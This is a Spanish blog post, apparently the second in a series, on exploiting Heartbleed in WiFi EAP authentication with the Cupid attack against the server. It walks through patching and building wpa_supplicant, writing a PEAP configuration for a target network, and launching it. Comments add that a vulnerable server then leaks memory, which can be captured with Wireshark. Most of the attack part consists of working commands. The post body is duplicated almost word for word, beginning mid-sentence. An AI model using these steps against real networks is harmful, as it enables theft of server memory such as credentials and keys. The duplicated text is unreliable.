Como ya vimos en entradas anteriores, Cupido es el nombre del nuevo método de ataque recientemente propuesto por el investigador de seguridad portugués Luis Grangeia, que puede afectar a Android, redes inalámbricas
empresariales y algun que otro dispositivo ;D.
A diferencia de la versión original del ataque Heartbleed, que tiene lugar en las conexiones TLS a través de TCP, el ataque de Cupido sucede en las conexiones TLS a través del protocolo de autenticación extensible (EAP), popular marco de autenticación que se utiliza normalmente en las redes inalámbricas y conexiones peer-to-peer.
En la entrada Explotar Heartbleed en redes WiFi con Cupido (1ª parte) vimos como realizar el ataque dirigido hacia el cliente.
Siguiendo con esta serie de entradas dedicadas a Cupido hoy veremos la manera en que se explota al servidor, es decir, atacando desde el lado del cliente.
Resulta bastante sencillo en realidad. Para empezar nos bajamos los fuentes de wpa_supplicant y el paquete de Cupido.
wget http://hostap.epitest.fi/releases/wpa_supplicant-2.1.tar.gz
tar -xf wpa_supplicant-2.1.tar.gz
Después copiaremos patch_wpasupplicant al directorio creado wpa_supplicant-2.1, parcheamos y compilamos. NO INSTALEIS solo make.
patch -p1 <patch_wpasuplicant
make
A continuación hacemos un fichero de configuracion de wpa_ssuplicant de manera que quede así:
network={
ssid="REDATACAR"
key_mgmt=WPA-EAP
pairwise=CCMP TKIP
group=CCMP TKIP WEP104 WEP40
eap=PEAP
# eap=TTLS
identity="userfoo"
password="foobar"
# fragment_size=30
phase1="peaplabel=1 include_tls_length=1"
}
y lanzamos los supplicantes:
./wpa_supplicant -Dwext -i wlan0 -c test_wpasupplicant.conf -ddd
Un saludo !!
empresariales y algun que otro dispositivo ;D.
A diferencia de la versión original del ataque Heartbleed, que tiene lugar en las conexiones TLS a través de TCP, el ataque de Cupido sucede en las conexiones TLS a través del protocolo de autenticación extensible (EAP), popular marco de autenticación que se utiliza normalmente en las redes inalámbricas y conexiones peer-to-peer.
En la entrada Explotar Heartbleed en redes WiFi con Cupido (1ª parte) vimos como realizar el ataque dirigido hacia el cliente.
Siguiendo con esta serie de entradas dedicadas a Cupido hoy veremos la manera en que se explota al servidor, es decir, atacando desde el lado del cliente.
Resulta bastante sencillo en realidad. Para empezar nos bajamos los fuentes de wpa_supplicant y el paquete de Cupido.
wget http://hostap.epitest.fi/releases/wpa_supplicant-2.1.tar.gz
tar -xf wpa_supplicant-2.1.tar.gz
Después copiaremos patch_wpasupplicant al directorio creado wpa_supplicant-2.1, parcheamos y compilamos. NO INSTALEIS solo make.
patch -p1 <patch_wpasuplicant
make
A continuación hacemos un fichero de configuracion de wpa_ssuplicant de manera que quede así:
network={
ssid="REDATACAR"
key_mgmt=WPA-EAP
pairwise=CCMP TKIP
group=CCMP TKIP WEP104 WEP40
eap=PEAP
# eap=TTLS
identity="userfoo"
password="foobar"
# fragment_size=30
phase1="peaplabel=1 include_tls_length=1"
}
y lanzamos los supplicantes:
./wpa_supplicant -Dwext -i wlan0 -c test_wpasupplicant.conf -ddd
Un saludo !!
Hola
ResponderEliminarNo acabo de entender el ataque. Pones la red a a atacar en el fichero conf. Y luego que?
Gracias y saludos,
te conectAS , PONIENDO LA INTERFACE DE RED EN modo monitor y con el wireshark sniffando la conexion , si la red es vulnerable escupira lo que tenga el server en la memoria
ResponderEliminar